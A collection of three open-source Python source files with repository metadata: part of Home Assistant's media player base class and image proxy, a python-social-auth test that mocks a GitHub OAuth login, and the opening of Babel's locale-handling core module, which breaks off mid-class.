"""Volume level of the media player (0..1)."""
return None
@property
def is_volume_muted(self):
"""Boolean if volume is currently muted."""
return None
@property
def media_content_id(self):
"""Content ID of current playing media."""
return None
@property
def media_content_type(self):
"""Content type of current playing media."""
return None
@property
def media_duration(self):
"""Duration of current playing media in seconds."""
return None
@property
def media_position(self):
"""Position of current playing media in seconds."""
return None
@property
def media_position_updated_at(self):
"""When was the position of the current playing media valid.
Returns value from homeassistant.util.dt.utcnow().
"""
return None
@property
def media_image_url(self):
"""Image url of current playing media."""
return None
@property
def media_image_remotely_accessible(self) -> bool:
"""If the image url is remotely accessible."""
return False
@property
def media_image_hash(self):
"""Hash value for media image."""
url = self.media_image_url
if url is not None:
return hashlib.sha256(url.encode("utf-8")).hexdigest()[:16]
return None
async def async_get_media_image(self):
"""Fetch media image of current playing image."""
url = self.media_image_url
if url is None:
return None, None
return await _async_fetch_image(self.hass, url)
@property
def media_title(self):
"""Title of current playing media."""
return None
@property
def media_artist(self):
"""Artist of current playing media, music track only."""
return None
@property
def media_album_name(self):
"""Album name of current playing media, music track only."""
return None
@property
def media_album_artist(self):
"""Album artist of current playing media, music track only."""
return None
@property
def media_track(self):
"""Track number of current playing media, music track only."""
return None
@property
def media_series_title(self):
"""Title of series of current playing media, TV show only."""
return None
@property
def media_season(self):
"""Season of current playing media, TV show only."""
return None
@property
def media_episode(self):
"""Episode of current playing media, TV show only."""
return None
@property
def media_channel(self):
"""Channel currently playing."""
return None
@property
def media_playlist(self):
"""Title of Playlist currently playing."""
return None
@property
def app_id(self):
"""ID of the current running app."""
return None
@property
def app_name(self):
"""Name of the current running app."""
return None
@property
def source(self):
"""Name of the current input source."""
return None
@property
def source_list(self):
"""List of available input sources."""
return None
@property
def sound_mode(self):
"""Name of the current sound mode."""
return None
@property
def sound_mode_list(self):
"""List of available sound modes."""
return None
@property
def shuffle(self):
"""Boolean if shuffle is enabled."""
return None
@property
def supported_features(self):
"""Flag media player features that are supported."""
return 0
def turn_on(self):
"""Turn the media player on."""
raise NotImplementedError()
async def async_turn_on(self):
"""Turn the media player on."""
await self.hass.async_add_job(self.turn_on)
def turn_off(self):
"""Turn the media player off."""
raise NotImplementedError()
async def async_turn_off(self):
"""Turn the media player off."""
await self.hass.async_add_job(self.turn_off)
def mute_volume(self, mute):
"""Mute the volume."""
raise NotImplementedError()
async def async_mute_volume(self, mute):
"""Mute the volume."""
await self.hass.async_add_job(self.mute_volume, mute)
def set_volume_level(self, volume):
"""Set volume level, range 0..1."""
raise NotImplementedError()
async def async_set_volume_level(self, volume):
"""Set volume level, range 0..1."""
await self.hass.async_add_job(self.set_volume_level, volume)
def media_play(self):
"""Send play command."""
raise NotImplementedError()
async def async_media_play(self):
"""Send play command."""
await self.hass.async_add_job(self.media_play)
def media_pause(self):
"""Send pause command."""
raise NotImplementedError()
async def async_media_pause(self):
"""Send pause command."""
await self.hass.async_add_job(self.media_pause)
def media_stop(self):
"""Send stop command."""
raise NotImplementedError()
async def async_media_stop(self):
"""Send stop command."""
await self.hass.async_add_job(self.media_stop)
def media_previous_track(self):
"""Send previous track command."""
raise NotImplementedError()
async def async_media_previous_track(self):
"""Send previous track command."""
await self.hass.async_add_job(self.media_previous_track)
def media_next_track(self):
"""Send next track command."""
raise NotImplementedError()
async def async_media_next_track(self):
"""Send next track command."""
await self.hass.async_add_job(self.media_next_track)
def media_seek(self, position):
"""Send seek command."""
raise NotImplementedError()
async def async_media_seek(self, position):
"""Send seek command."""
await self.hass.async_add_job(self.media_seek, position)
def play_media(self, media_type, media_id, **kwargs):
"""Play a piece of media."""
raise NotImplementedError()
async def async_play_media(self, media_type, media_id, **kwargs):
"""Play a piece of media."""
await self.hass.async_add_job(
ft.partial(self.play_media, media_type, media_id, **kwargs)
)
def select_source(self, source):
"""Select input source."""
raise NotImplementedError()
async def async_select_source(self, source):
"""Select input source."""
await self.hass.async_add_job(self.select_source, source)
def select_sound_mode(self, sound_mode):
"""Select sound mode."""
raise NotImplementedError()
async def async_select_sound_mode(self, sound_mode):
"""Select sound mode."""
await self.hass.async_add_job(self.select_sound_mode, sound_mode)
def clear_playlist(self):
"""Clear players playlist."""
raise NotImplementedError()
async def async_clear_playlist(self):
"""Clear players playlist."""
await self.hass.async_add_job(self.clear_playlist)
def set_shuffle(self, shuffle):
"""Enable/disable shuffle mode."""
raise NotImplementedError()
async def async_set_shuffle(self, shuffle):
"""Enable/disable shuffle mode."""
await self.hass.async_add_job(self.set_shuffle, shuffle)
# No need to overwrite these.
@property
def support_play(self):
"""Boolean if play is supported."""
return bool(self.supported_features & SUPPORT_PLAY)
@property
def support_pause(self):
"""Boolean if pause is supported."""
return bool(self.supported_features & SUPPORT_PAUSE)
@property
def support_stop(self):
"""Boolean if stop is supported."""
return bool(self.supported_features & SUPPORT_STOP)
@property
def support_seek(self):
"""Boolean if seek is supported."""
return bool(self.supported_features & SUPPORT_SEEK)
@property
def support_volume_set(self):
"""Boolean if setting volume is supported."""
return bool(self.supported_features & SUPPORT_VOLUME_SET)
@property
def support_volume_mute(self):
"""Boolean if muting volume is supported."""
return bool(self.supported_features & SUPPORT_VOLUME_MUTE)
@property
def support_previous_track(self):
"""Boolean if previous track command supported."""
return bool(self.supported_features & SUPPORT_PREVIOUS_TRACK)
@property
def support_next_track(self):
"""Boolean if next track command supported."""
return bool(self.supported_features & SUPPORT_NEXT_TRACK)
@property
def support_play_media(self):
"""Boolean if play media command supported."""
return bool(self.supported_features & SUPPORT_PLAY_MEDIA)
@property
def support_select_source(self):
"""Boolean if select source command supported."""
return bool(self.supported_features & SUPPORT_SELECT_SOURCE)
@property
def support_select_sound_mode(self):
"""Boolean if select sound mode command supported."""
return bool(self.supported_features & SUPPORT_SELECT_SOUND_MODE)
@property
def support_clear_playlist(self):
"""Boolean if clear playlist command supported."""
return bool(self.supported_features & SUPPORT_CLEAR_PLAYLIST)
@property
def support_shuffle_set(self):
"""Boolean if shuffle is supported."""
return bool(self.supported_features & SUPPORT_SHUFFLE_SET)
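    # Illustrative sketch (not part of this module): a concrete integration
    # usually advertises its capabilities by OR-ing the SUPPORT_* bit flags
    # together, and the support_* helpers above simply test those bits, e.g.:
    #
    #     class DemoPlayer(MediaPlayerDevice):
    #         @property
    #         def supported_features(self):
    #             return SUPPORT_PLAY | SUPPORT_PAUSE | SUPPORT_VOLUME_SET
    #
    #     DemoPlayer().support_play   # True
    #     DemoPlayer().support_seek   # False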
async def async_toggle(self):
"""Toggle the power on the media player."""
if hasattr(self, "toggle"):
# pylint: disable=no-member
await self.hass.async_add_job(self.toggle)
return
if self.state in [STATE_OFF, STATE_IDLE]:
await self.async_turn_on()
else:
await self.async_turn_off()
async def async_volume_up(self):
"""Turn volume up for media player.
This method is a coroutine.
"""
if hasattr(self, "volume_up"):
# pylint: disable=no-member
await self.hass.async_add_job(self.volume_up)
return
if self.volume_level < 1 and self.supported_features & SUPPORT_VOLUME_SET:
await self.async_set_volume_level(min(1, self.volume_level + 0.1))
async def async_volume_down(self):
"""Turn volume down for media player.
This method is a coroutine.
"""
if hasattr(self, "volume_down"):
# pylint: disable=no-member
await self.hass.async_add_job(self.volume_down)
return
if self.volume_level > 0 and self.supported_features & SUPPORT_VOLUME_SET:
await self.async_set_volume_level(max(0, self.volume_level - 0.1))
async def async_media_play_pause(self):
"""Play or pause the media player."""
if hasattr(self, "media_play_pause"):
# pylint: disable=no-member
await self.hass.async_add_job(self.media_play_pause)
return
if self.state == STATE_PLAYING:
await self.async_media_pause()
else:
await self.async_media_play()
@property
def entity_picture(self):
"""Return image of the media playing."""
if self.state == STATE_OFF:
return None
if self.media_image_remotely_accessible:
return self.media_image_url
image_hash = self.media_image_hash
if image_hash is None:
return None
return ENTITY_IMAGE_URL.format(self.entity_id, self.access_token, image_hash)
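    # Illustrative note (an assumption about ENTITY_IMAGE_URL, which is defined
    # elsewhere in this integration): the proxy URL rendered above typically
    # looks something like
    #
    #     /api/media_player_proxy/media_player.living_room?token=<access_token>&cache=<image_hash>
    #
    # and is served by MediaPlayerImageView below, which accepts either an
    # authenticated request or the matching ?token= query parameter.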
@property
def capability_attributes(self):
"""Return capability attributes."""
supported_features = self.supported_features or 0
data = {}
if supported_features & SUPPORT_SELECT_SOURCE:
source_list = self.source_list
if source_list:
data[ATTR_INPUT_SOURCE_LIST] = source_list
if supported_features & SUPPORT_SELECT_SOUND_MODE:
sound_mode_list = self.sound_mode_list
if sound_mode_list:
data[ATTR_SOUND_MODE_LIST] = sound_mode_list
return data
@property
def state_attributes(self):
"""Return the state attributes."""
if self.state == STATE_OFF:
return None
state_attr = {
attr: getattr(self, attr)
for attr in ATTR_TO_PROPERTY
if getattr(self, attr) is not None
}
return state_attr
async def _async_fetch_image(hass, url):
"""Fetch image.
Images are cached in memory (the images are typically 10-100kB in size).
"""
cache_images = ENTITY_IMAGE_CACHE[CACHE_IMAGES]
cache_maxsize = ENTITY_IMAGE_CACHE[CACHE_MAXSIZE]
if urlparse(url).hostname is None:
url = hass.config.api.base_url + url
if url not in cache_images:
cache_images[url] = {CACHE_LOCK: asyncio.Lock()}
async with cache_images[url][CACHE_LOCK]:
if CACHE_CONTENT in cache_images[url]:
return cache_images[url][CACHE_CONTENT]
content, content_type = (None, None)
websession = async_get_clientsession(hass)
try:
with async_timeout.timeout(10):
response = await websession.get(url)
if response.status == 200:
content = await response.read()
content_type = response.headers.get(CONTENT_TYPE)
if content_type:
content_type = content_type.split(";")[0]
cache_images[url][CACHE_CONTENT] = content, content_type
except asyncio.TimeoutError:
pass
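        # Evict the oldest entries once the cache grows past its limit;
        # cache_images is assumed to be an insertion-ordered mapping (e.g.
        # collections.OrderedDict), which is what popitem(last=False) requires.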
while len(cache_images) > cache_maxsize:
cache_images.popitem(last=False)
return content, content_type
class MediaPlayerImageView(HomeAssistantView):
"""Media player view to serve an image."""
requires_auth = False
url = "/api/media_player_proxy/{entity_id}"
name = "api:media_player:image"
def __init__(self, component):
"""Initialize a media player view."""
self.component = component
async def get(self, request, entity_id):
"""Start a get request."""
player = self.component.get_entity(entity_id)
if player is None:
status = 404 if request[KEY_AUTHENTICATED] else 401
return web.Response(status=status)
authenticated = (
request[KEY_AUTHENTICATED]
or request.query.get("token") == player.access_token
)
if not authenticated:
return web.Response(status=401)
if player.media_image_remotely_accessible:
url = player.media_image_url
if url is not None:
return web.Response(status=302, headers={"location": url})
return web.Response(status=500)
data, content_type = await player.async_get_media_image()
if data is None:
return web.Response(status=500)
headers = {CACHE_CONTROL: "max-age=3600"}
return web.Response(body=data, content_type=content_type, headers=headers)
@websocket_api.async_response
async def websocket_handle_thumbnail(hass, connection, msg):
"""Handle get media player cover command.
Async friendly.
"""
component = hass.data[DOMAIN]
player = component.get_entity(msg["entity_id"])
if player is None:
connection.send_message(
websocket_api.error_message(
msg["id"], "entity_not_found", "Entity not found"
)
)
return
data, content_type = await player.async_get_media_image()
if data is None:
connection.send_message(
websocket_api.error_message(
msg["id"], "thumbnail_fetch_failed", "Failed to fetch thumbnail"
)
)
return
await connection.send_big_result(
msg["id"],
{
"content_type": content_type,
"content": base64.b64encode(data).decode("utf-8"),
},
)
| {
"content_hash": "20d0bd60832b2dd84225569379134859",
"timestamp": "",
"source": "github",
"line_count": 914,
"max_line_length": 85,
"avg_line_length": 29.200218818380744,
"alnum_prop": 0.6193562891078721,
"repo_name": "postlund/home-assistant",
"id": "8a31dbe6bdb611443580ca611a0ee910d539744f",
"size": "26689",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "homeassistant/components/media_player/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "20215859"
},
{
"name": "Shell",
"bytes": "6663"
}
],
"symlink_target": ""
} |
import json
import requests
import unittest
from sure import expect
from httpretty import HTTPretty
from social.utils import parse_qs, module_member
from social.p3 import urlparse
from social.actions import do_auth, do_complete
from social.tests.models import TestStorage, User, TestUserSocialAuth, \
TestNonce, TestAssociation
from social.tests.strategy import TestStrategy
class BaseActionTest(unittest.TestCase):
user_data_url = 'https://api.github.com/user'
login_redirect_url = '/success'
expected_username = 'foobar'
access_token_body = json.dumps({
'access_token': 'foobar',
'token_type': 'bearer'
})
user_data_body = json.dumps({
'login': 'foobar',
'id': 1,
'avatar_url': 'https://github.com/images/error/foobar_happy.gif',
'gravatar_id': 'somehexcode',
'url': 'https://api.github.com/users/foobar',
'name': 'monalisa foobar',
'company': 'GitHub',
'blog': 'https://github.com/blog',
'location': 'San Francisco',
'email': 'foo@bar.com',
'hireable': False,
'bio': 'There once was...',
'public_repos': 2,
'public_gists': 1,
'followers': 20,
'following': 0,
'html_url': 'https://github.com/foobar',
'created_at': '2008-01-14T04:33:35Z',
'type': 'User',
'total_private_repos': 100,
'owned_private_repos': 100,
'private_gists': 81,
'disk_usage': 10000,
'collaborators': 8,
'plan': {
'name': 'Medium',
'space': 400,
'collaborators': 10,
'private_repos': 20
}
})
def setUp(self):
HTTPretty.enable()
User.reset_cache()
TestUserSocialAuth.reset_cache()
TestNonce.reset_cache()
TestAssociation.reset_cache()
self.backend = module_member('social.backends.github.GithubOAuth2')
self.strategy = TestStrategy(self.backend, TestStorage)
self.user = None
def tearDown(self):
self.backend = None
self.strategy = None
self.user = None
User.reset_cache()
User.set_active(True)
TestUserSocialAuth.reset_cache()
TestNonce.reset_cache()
TestAssociation.reset_cache()
HTTPretty.disable()
def do_login(self, after_complete_checks=True, user_data_body=None,
expected_username=None):
self.strategy.set_settings({
'SOCIAL_AUTH_GITHUB_KEY': 'a-key',
'SOCIAL_AUTH_GITHUB_SECRET': 'a-secret-key',
'SOCIAL_AUTH_LOGIN_REDIRECT_URL': self.login_redirect_url,
'SOCIAL_AUTH_AUTHENTICATION_BACKENDS': (
'social.backends.github.GithubOAuth2',
)
})
start_url = do_auth(self.strategy).url
target_url = self.strategy.build_absolute_uri(
'/complete/github/?code=foobar'
)
start_query = parse_qs(urlparse(start_url).query)
location_url = target_url + ('?' in target_url and '&' or '?') + \
'state=' + start_query['state']
location_query = parse_qs(urlparse(location_url).query)
HTTPretty.register_uri(HTTPretty.GET, start_url, status=301,
location=location_url)
HTTPretty.register_uri(HTTPretty.GET, location_url, status=200,
body='foobar')
response = requests.get(start_url)
expect(response.url).to.equal(location_url)
expect(response.text).to.equal('foobar')
HTTPretty.register_uri(HTTPretty.GET,
uri=self.backend.ACCESS_TOKEN_URL,
status=200,
body=self.access_token_body or '',
content_type='text/json')
if self.user_data_url:
user_data_body = user_data_body or self.user_data_body or ''
HTTPretty.register_uri(HTTPretty.GET, self.user_data_url,
body=user_data_body,
content_type='text/json')
self.strategy.set_request_data(location_query)
redirect = do_complete(
self.strategy,
user=self.user,
login=lambda strategy, user: strategy.session_set('username',
user.username)
)
if after_complete_checks:
expect(self.strategy.session_get('username')).to.equal(
expected_username or self.expected_username
)
expect(redirect.url).to.equal(self.login_redirect_url)
return redirect
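    # Illustrative usage (hypothetical test case, not part of this module):
    # concrete action tests typically just subclass BaseActionTest and drive
    # the mocked OAuth2 dance, e.g.:
    #
    #     class LoginActionTest(BaseActionTest):
    #         def test_login(self):
    #             self.do_login()
    #
    #         def test_login_with_partial_pipeline(self):
    #             self.do_login_with_partial_pipeline()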
def do_login_with_partial_pipeline(self, before_complete=None):
self.strategy.set_settings({
'SOCIAL_AUTH_GITHUB_KEY': 'a-key',
'SOCIAL_AUTH_GITHUB_SECRET': 'a-secret-key',
'SOCIAL_AUTH_LOGIN_REDIRECT_URL': self.login_redirect_url,
'SOCIAL_AUTH_AUTHENTICATION_BACKENDS': (
'social.backends.github.GithubOAuth2',
),
'SOCIAL_AUTH_PIPELINE': (
'social.pipeline.social_auth.social_details',
'social.pipeline.social_auth.social_uid',
'social.pipeline.social_auth.auth_allowed',
'social.pipeline.partial.save_status_to_session',
'social.tests.pipeline.ask_for_password',
'social.pipeline.social_auth.social_user',
'social.pipeline.user.get_username',
'social.pipeline.user.create_user',
'social.pipeline.social_auth.associate_user',
'social.pipeline.social_auth.load_extra_data',
'social.tests.pipeline.set_password',
'social.pipeline.user.user_details'
)
})
start_url = do_auth(self.strategy).url
target_url = self.strategy.build_absolute_uri(
'/complete/github/?code=foobar'
)
start_query = parse_qs(urlparse(start_url).query)
location_url = target_url + ('?' in target_url and '&' or '?') + \
'state=' + start_query['state']
location_query = parse_qs(urlparse(location_url).query)
HTTPretty.register_uri(HTTPretty.GET, start_url, status=301,
location=location_url)
HTTPretty.register_uri(HTTPretty.GET, location_url, status=200,
body='foobar')
response = requests.get(start_url)
expect(response.url).to.equal(location_url)
expect(response.text).to.equal('foobar')
HTTPretty.register_uri(HTTPretty.GET,
uri=self.backend.ACCESS_TOKEN_URL,
status=200,
body=self.access_token_body or '',
content_type='text/json')
if self.user_data_url:
HTTPretty.register_uri(HTTPretty.GET, self.user_data_url,
body=self.user_data_body or '',
content_type='text/json')
self.strategy.set_request_data(location_query)
def _login(strategy, user):
strategy.session_set('username', user.username)
redirect = do_complete(self.strategy, user=self.user, login=_login)
url = self.strategy.build_absolute_uri('/password')
expect(redirect.url).to.equal(url)
HTTPretty.register_uri(HTTPretty.GET, redirect.url, status=200,
body='foobar')
HTTPretty.register_uri(HTTPretty.POST, redirect.url, status=200)
password = 'foobar'
requests.get(url)
requests.post(url, data={'password': password})
data = parse_qs(HTTPretty.last_request.body)
expect(data['password']).to.equal(password)
self.strategy.session_set('password', data['password'])
if before_complete:
before_complete()
redirect = do_complete(self.strategy, user=self.user, login=_login)
expect(self.strategy.session_get('username')).to.equal(
self.expected_username
)
expect(redirect.url).to.equal(self.login_redirect_url)
| {
"content_hash": "c9a285b66b2f33c2d662500ef04c14e2",
"timestamp": "",
"source": "github",
"line_count": 210,
"max_line_length": 76,
"avg_line_length": 39.680952380952384,
"alnum_prop": 0.5598223928957158,
"repo_name": "nvbn/python-social-auth",
"id": "19b2bdda372c4f6884abb9d841c17eb6caaab868",
"size": "8333",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "social/tests/actions/actions.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "54"
},
{
"name": "Python",
"bytes": "451960"
},
{
"name": "Shell",
"bytes": "67"
}
],
"symlink_target": ""
} |
"""
babel.core
~~~~~~~~~~
Core locale representation and locale data access.
:copyright: (c) 2013 by the Babel Team.
:license: BSD, see LICENSE for more details.
"""
import os
from babel import localedata
from babel._compat import pickle, string_types
from babel.plural import PluralRule
__all__ = ['UnknownLocaleError', 'Locale', 'default_locale', 'negotiate_locale',
'parse_locale']
_global_data = None
_default_plural_rule = PluralRule({})
def _raise_no_data_error():
raise RuntimeError('The babel data files are not available. '
'This usually happens because you are using '
'a source checkout from Babel and you did '
'not build the data files. Just make sure '
'to run "python setup.py import_cldr" before '
'installing the library.')
def get_global(key):
"""Return the dictionary for the given key in the global data.
The global data is stored in the ``babel/global.dat`` file and contains
information independent of individual locales.
>>> get_global('zone_aliases')['UTC']
u'Etc/GMT'
>>> get_global('zone_territories')['Europe/Berlin']
u'DE'
The keys available are:
- ``currency_fractions``
- ``language_aliases``
- ``likely_subtags``
- ``parent_exceptions``
- ``script_aliases``
- ``territory_aliases``
- ``territory_currencies``
- ``territory_languages``
- ``territory_zones``
- ``variant_aliases``
- ``windows_zone_mapping``
- ``zone_aliases``
- ``zone_territories``
.. note:: The internal structure of the data may change between versions.
.. versionadded:: 0.9
:param key: the data key
"""
global _global_data
if _global_data is None:
dirname = os.path.join(os.path.dirname(__file__))
filename = os.path.join(dirname, 'global.dat')
if not os.path.isfile(filename):
_raise_no_data_error()
with open(filename, 'rb') as fileobj:
_global_data = pickle.load(fileobj)
return _global_data.get(key, {})
LOCALE_ALIASES = {
'ar': 'ar_SY', 'bg': 'bg_BG', 'bs': 'bs_BA', 'ca': 'ca_ES', 'cs': 'cs_CZ',
'da': 'da_DK', 'de': 'de_DE', 'el': 'el_GR', 'en': 'en_US', 'es': 'es_ES',
'et': 'et_EE', 'fa': 'fa_IR', 'fi': 'fi_FI', 'fr': 'fr_FR', 'gl': 'gl_ES',
'he': 'he_IL', 'hu': 'hu_HU', 'id': 'id_ID', 'is': 'is_IS', 'it': 'it_IT',
'ja': 'ja_JP', 'km': 'km_KH', 'ko': 'ko_KR', 'lt': 'lt_LT', 'lv': 'lv_LV',
'mk': 'mk_MK', 'nl': 'nl_NL', 'nn': 'nn_NO', 'no': 'nb_NO', 'pl': 'pl_PL',
'pt': 'pt_PT', 'ro': 'ro_RO', 'ru': 'ru_RU', 'sk': 'sk_SK', 'sl': 'sl_SI',
'sv': 'sv_SE', 'th': 'th_TH', 'tr': 'tr_TR', 'uk': 'uk_UA'
}
class UnknownLocaleError(Exception):
"""Exception thrown when a locale is requested for which no locale data
is available.
"""
def __init__(self, identifier):
"""Create the exception.
:param identifier: the identifier string of the unsupported locale
"""
Exception.__init__(self, 'unknown locale %r' % identifier)
#: The identifier of the locale that could not be found.
self.identifier = identifier
class Locale(object):
"""Representation of a specific locale.
>>> locale = Locale('en', 'US')
>>> repr(locale)
"Locale('en', territory='US')"
>>> locale.display_name
u'English (United States)'
A `Locale` object can also be instantiated from a raw locale string:
>>> locale = Locale.parse('en-US', sep='-')
>>> repr(locale)
"Locale('en', territory='US')"
`Locale` objects provide access to a collection of locale data, such as
territory and language names, number and date format patterns, and more:
>>> locale.number_symbols['decimal']
u'.'
If a locale is requested for which no locale data is available, an
`UnknownLocaleError` is raised:
>>> Locale.parse('en_XX')
Traceback (most recent call last):
...
UnknownLocaleError: unknown locale 'en_XX'
For more information see :rfc:`3066`.
"""
def __init__(self, language, territory=None, script=None, variant=None):
"""Initialize the locale object from the given identifier components.
>>> locale = Locale('en', 'US')
>>> locale.language
'en'
>>> locale.territory
'US'
:param language: the language code
:param territory: the territory (country or region) code
:param script: the script code
:param variant: the variant code
:raise `UnknownLocaleError`: if no locale data is available for the
requested locale
"""
#: the language code
self.language = language
#: the territory (country or region) code
self.territory = territory
#: the script code
self.script = script
#: the variant code
self.variant = variant
self.__data = None
identifier = str(self)
if not localedata.exists(identifier):
raise UnknownLocaleError(identifier)
@classmethod
def default(cls, category=None, aliases=LOCALE_ALIASES):
"""Return the system default locale for the specified category.
>>> for name in ['LANGUAGE', 'LC_ALL', 'LC_CTYPE', 'LC_MESSAGES']:
... os.environ[name] = ''
>>> os.environ['LANG'] = 'fr_FR.UTF-8'
>>> Locale.default('LC_MESSAGES')
Locale('fr', territory='FR')
        The following environment variables are always considered as fallbacks:
- ``LANGUAGE``
- ``LC_ALL``
- ``LC_CTYPE``
- ``LANG``
:param category: one of the ``LC_XXX`` environment variable names
:param aliases: a dictionary of aliases for locale identifiers
"""
# XXX: use likely subtag expansion here instead of the
# aliases dictionary.
locale_string = default_locale(category, aliases=aliases)
return cls.parse(locale_string)
@classmethod
def negotiate(cls, preferred, available, sep='_', aliases=LOCALE_ALIASES):
"""Find the best match between available and requested locale strings.
>>> Locale.negotiate(['de_DE', 'en_US'], ['de_DE', 'de_AT'])
Locale('de', territory='DE')
>>> Locale.negotiate(['de_DE', 'en_US'], ['en', 'de'])
Locale('de')
>>> Locale.negotiate(['de_DE', 'de'], ['en_US'])
You can specify the character used in the locale identifiers to separate
        the different components. This separator is applied to both lists. Also,
case is ignored in the comparison:
>>> Locale.negotiate(['de-DE', 'de'], ['en-us', 'de-de'], sep='-')
Locale('de', territory='DE')
        :param preferred: the list of locale identifiers preferred by the user
:param available: the list of locale identifiers available
:param aliases: a dictionary of aliases for locale identifiers
"""
identifier = negotiate_locale(preferred, available, sep=sep,
aliases=aliases)
if identifier:
return Locale.parse(identifier, sep=sep)
@classmethod
def parse(cls, identifier, sep='_', resolve_likely_subtags=True):
"""Create a `Locale` instance for the given locale identifier.
>>> l = Locale.parse('de-DE', sep='-')
>>> l.display_name
u'Deutsch (Deutschland)'
If the `identifier` parameter is not a string, but actually a `Locale`
object, that object is returned:
>>> Locale.parse(l)
Locale('de', territory='DE')
        This can also resolve likely subtags, which it does by default.
        This is useful, for instance, to figure out the most likely locale
        for a territory; here you can use ``'und'`` as the language tag:
>>> Locale.parse('und_AT')
Locale('de', territory='AT')
:param identifier: the locale identifier string
:param sep: optional component separator
:param resolve_likely_subtags: if this is specified then a locale will
have its likely subtag resolved if the
locale otherwise does not exist. For
instance ``zh_TW`` by itself is not a
locale that exists but Babel can
automatically expand it to the full
                                       form of ``zh_Hant_TW``. Note that this
                                       expansion only takes place if the
                                       locale does not otherwise exist; for
                                       instance, the locale ``en`` exists by
                                       itself.
:raise `ValueError`: if the string does not appear to be a valid locale
identifier
:raise `UnknownLocaleError`: if no locale data is available for the
requested locale
"""
if identifier is None:
return None
elif isinstance(identifier, Locale):
return identifier
elif not isinstance(identifier, string_types):
raise TypeError('Unexpected value for identifier: %r' % (identifier,))
parts = parse_locale(identifier, sep=sep)
input_id = get_locale_identifier(parts)
def _try_load(parts):
try:
return cls(*parts)
except UnknownLocaleError:
return None
def _try_load_reducing(parts):
# Success on first hit, return it.
locale = _try_load(parts)
if locale is not None:
return locale
# Now try without script and variant
locale = _try_load(parts[:2])
if locale is not None:
return locale
if not resolve_likely_subtags:
raise UnknownLocaleError(input_id)
# From here onwards is some very bad likely subtag resolving. This
# whole logic is not entirely correct but good enough (tm) for the
# time being. This has been added so that zh_TW does not cause
# errors for people when they upgrade. Later we should properly
# implement ICU like fuzzy locale objects and provide a way to
# maximize and minimize locale tags.
language, territory, script, variant = parts
language = get_global('language_aliases').get(language, language)
territory = get_global('territory_aliases').get(territory, (territory,))[0]
script = get_global('script_aliases').get(script, script)
variant = get_global('variant_aliases').get(variant, variant)
if territory == 'ZZ':
territory = None
if script == 'Zzzz':
script = None
parts = language, territory, script, variant
# First match: try the whole identifier
new_id = get_locale_identifier(parts)
likely_subtag = get_global('likely_subtags').get(new_id)
if likely_subtag is not None:
locale = _try_load_reducing(parse_locale(likely_subtag))
if locale is not None:
return locale
# If we did not find anything so far, try again with a
# simplified identifier that is just the language
likely_subtag = get_global('likely_subtags').get(language)
if likely_subtag is not None:
language2, _, script2, variant2 = parse_locale(likely_subtag)
locale = _try_load_reducing((language2, territory, script2, variant2))
if locale is not None:
return locale
raise UnknownLocaleError(input_id)
def __eq__(self, other):
for key in ('language', 'territory', 'script', 'variant'):
if not hasattr(other, key):
return False
return (self.language == other.language) and \
(self.territory == other.territory) and \
(self.script == other.script) and \
(self.variant == other.variant)
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return hash((self.language, self.territory, self.script, self.variant))
def __repr__(self):
parameters = ['']
for key in ('territory', 'script', 'variant'):
value = getattr(self, key)
if value is not None:
parameters.append('%s=%r' % (key, value))
parameter_string = '%r' % self.language + ', '.join(parameters)
return 'Locale(%s)' % parameter_string
def __str__(self):
return get_locale_identifier((self.language, self.territory,
self.script, self.variant))
@property
def _data(self):
if self.__data is None:
self.__data = localedata.LocaleDataDict(localedata.load(str(self)))
return self.__data
def get_display_name(self, locale=None):
"""Return the display name of the locale using the given locale.
The display name will include the language, territory, script, and
variant, if those are specified.
>>> Locale('zh', 'CN', script='Hans').get_display_name('en')
u'Chinese (Simplified, China)'
:param locale: the locale to use
"""
if locale is None:
locale = self
locale = Locale.parse(locale)
retval = locale.languages.get(self.language)
if self.territory or self.script or self.variant:
details = []
if self.script:
details.append(locale.scripts.get(self.script))
if self.territory:
details.append(locale.territories.get(self.territory))
if self.variant:
details.append(locale.variants.get(self.variant))
details = filter(None, details)
if details:
retval += ' (%s)' % u', '.join(details)
return retval
display_name = property(get_display_name, doc="""\
The localized display name of the locale.
>>> Locale('en').display_name
u'English'
>>> Locale('en', 'US').display_name
u'English (United States)'
>>> Locale('sv').display_name
u'svenska'
:type: `unicode`
""")
def get_language_name(self, locale=None):
"""Return the language of this locale in the given locale.
>>> Locale('zh', 'CN', script='Hans').get_language_name('de')
u'Chinesisch'
.. versionadded:: 1.0
:param locale: the locale to use
"""
if locale is None:
locale = self
locale = Locale.parse(locale)
return locale.languages.get(self.language)
language_name = property(get_language_name, doc="""\
The localized language name of the locale.
>>> Locale('en', 'US').language_name
u'English'
""")
def get_territory_name(self, locale=None):
"""Return the territory name in the given locale."""
if locale is None:
locale = self
locale = Locale.parse(locale)
return locale.territories.get(self.territory)
territory_name = property(get_territory_name, doc="""\
The localized territory name of the locale if available.
>>> Locale('de', 'DE').territory_name
u'Deutschland'
""")
def get_script_name(self, locale=None):
"""Return the script name in the given locale."""
if locale is None:
locale = self
locale = Locale.parse(locale)
return locale.scripts.get(self.script)
script_name = property(get_script_name, doc="""\
The localized script name of the locale if available.
>>> Locale('sr', 'ME', script='Latn').script_name
u'latinica'
""")
@property
def english_name(self):
"""The english display name of the locale.
>>> Locale('de').english_name
u'German'
>>> Locale('de', 'DE').english_name
u'German (Germany)'
:type: `unicode`"""
return self.get_display_name(Locale('en'))
# { General Locale Display Names
@property
def languages(self):
"""Mapping of language codes to translated language names.
>>> Locale('de', 'DE').languages['ja']
u'Japanisch'
See `ISO 639 <http://www.loc.gov/standards/iso639-2/>`_ for
more information.
"""
return self._data['languages']
@property
def scripts(self):
"""Mapping of script codes to translated script names.
>>> Locale('en', 'US').scripts['Hira']
u'Hiragana'
See `ISO 15924 <http://www.evertype.com/standards/iso15924/>`_
for more information.
"""
return self._data['scripts']
@property
def territories(self):
"""Mapping of script codes to translated script names.
>>> Locale('es', 'CO').territories['DE']
u'Alemania'
See `ISO 3166 <http://www.iso.org/iso/en/prods-services/iso3166ma/>`_
for more information.
"""
return self._data['territories']
@property
def variants(self):
"""Mapping of script codes to translated script names.
>>> Locale('de', 'DE').variants['1901']
u'Alte deutsche Rechtschreibung'
"""
return self._data['variants']
# { Number Formatting
@property
def currencies(self):
